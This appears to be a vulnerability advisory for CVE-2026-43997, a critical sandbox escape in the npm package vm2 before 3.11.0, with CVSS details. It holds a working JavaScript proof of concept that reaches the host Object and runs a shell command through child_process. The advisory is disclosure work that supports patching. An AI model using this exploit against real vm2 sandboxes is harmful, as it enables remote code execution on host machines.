CVE-2026-43997
CRITICAL10.0EPSS 0.02%vm2 Access to Host Object Enables Sandbox Escape
Description
### Summary It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete. ### Details There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)` ### PoC ```js const g = {}.__lookupGetter__; const a = Buffer.apply; const p = a.apply(g, [Buffer, ['__proto__']]); const o = p.call(p.call(a)); const HObject = o.constructor; sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); const obj = { [sym]: (depth, opt, inspect) => { inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")(); }, valueOf: undefined, constructor: undefined, }; WebAssembly.compileStreaming(obj).catch(() => {}); ``` ### Impact Sandbox Escape -> RCE
Affected packages (1)
- npm/vm2from 0, < 3.11.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |